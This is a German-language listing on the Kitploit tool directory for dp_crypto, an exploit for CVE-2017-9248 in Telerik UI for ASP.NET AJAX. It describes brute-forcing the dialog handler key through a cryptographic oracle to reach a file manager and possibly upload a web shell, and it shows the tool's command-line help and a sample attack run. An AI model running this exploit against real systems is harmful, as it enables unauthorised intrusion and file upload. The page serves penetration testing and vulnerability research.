Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
dp_crypto — Base64-basierter Verschlüsselungs-Orakel-Exploit für CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler) | Kitploit
Tools/GitHubGitHub/bao7uo/dp_crypto
Verschlüsselungs-/EntschlüsselungstoolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationKryptographiePenetrationstests
GitHubbao7uo/dp_crypto

dp_crypto

Base64-basierter Verschlüsselungs-Orakel-Exploit für CVE-2017-9248 (Telerik UI for ASP.NET AJAX dialog handler)

Repository anzeigen
1774910vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

dp_crypto

Language

Base64-basierter Verschlüsselungsorakel-Exploit für CVE-2017-9248 (Telerik UI for ASP.NET AJAX Dialog-Handler)

Veröffentlicht auf exploit-db

Update 2020 - Bitte beachten Sie, dass die Version auf exploit-db im Vergleich zur aktuellen Version hier auf GitHub mittlerweile stark veraltet ist.

  • https://www.exploit-db.com/exploits/43873/

Siehe auch

Mein anderer Telerik UI Exploit (für CVE-2017-11317 und CVE-2017-11357) könnte ebenfalls von Interesse sein. Er ist hier verfügbar:

  • https://github.com/bao7uo/RAU_crypto

Übersicht

Dieser Exploit greift eine schwache Verschlüsselungsimplementierung an, um den Dialog-Handler-Schlüssel für anfällige Versionen von Telerik UI for ASP.NET AJAX zu ermitteln. Anschließend wird ein verschlüsselter Link bereitgestellt, der Zugriff auf einen Dateimanager und, sofern die Remote-Dateiberechtigungen dies zulassen, auf das Hochladen beliebiger Dateien (z. B. Web-Shell) ermöglicht. Funktioniert bis einschließlich Version 2017.1.118.

dp_crypto screenshot

Verwendung

$ python3 dp_crypto.py -h

dp_crypto by Paul Taylor / @bao7uo
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

usage: dp_crypto.py [-h] {d,e,k,b,p} ...

positional arguments:
  {d,e,k,b,p}
    d          Decrypt a ciphertext
    e          Encrypt a plaintext
    k          Bruteforce key/generate URL
    b          Encode parameter to base64
    p          Decode base64 parameter

optional arguments:
  -h, --help   show this help message and exit

Um einen Schlüssel zu finden:

$ python3 dp_crypto.py k -h

dp_crypto by Paul Taylor / @bao7uo
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

usage: dp_crypto.py k [-h] -u URL [-l KEY_LEN] [-o ORACLE] [-v VERSION] [-c CHARSET] [-a ACCURACY] [-r RESUME_KEY] [-p PROXY]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL, e.g. https://???.???.???/Telerik.Web.UI.DialogHandler.aspx
  -l KEY_LEN, --key-len KEY_LEN
                        Len of the key to retrieve, OPTIONAL: default is 48
  -o ORACLE, --oracle ORACLE
                        The oracle text to use. OPTIONAL: default value is for english version, other languages may have other error message
  -v VERSION, --version VERSION
                        OPTIONAL. Specify the version to use rather than iterating over all of them
  -c CHARSET, --charset CHARSET
                        Charset used by the key, can use all, hex, or user defined. OPTIONAL: default is hex
  -a ACCURACY, --accuracy ACCURACY
                        Maximum accuracy is out of 64 where 64 is the most accurate, accuracy of 9 will usually suffice for a hex, but 21 or more might be needed
                        when testing all ascii characters. Increase the accuracy argument if no valid version is found. OPTIONAL: default is 9.
  -r RESUME_KEY, --resume-key RESUME_KEY
                        Specify a partial key to resume testing, or complete key to get the URL.
  -p PROXY, --proxy PROXY
                        Specify OPTIONAL proxy server, e.g. 127.0.0.1:8080

Beispiel

dp_crypto screenshot

$ ./dp_crypto.py k -u http://fake.bao7uo.com/Telerik.Web.UI.DialogHandler.aspx

dp_crypto by Paul Taylor / @bao7uo
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

Attacking http://192.168.55.2/Telerik.Web.UI.DialogHandler.aspx
to find key of length [48] with accuracy threshold [9]
using key charset [01234567890ABCDEF]
Tool herunterladen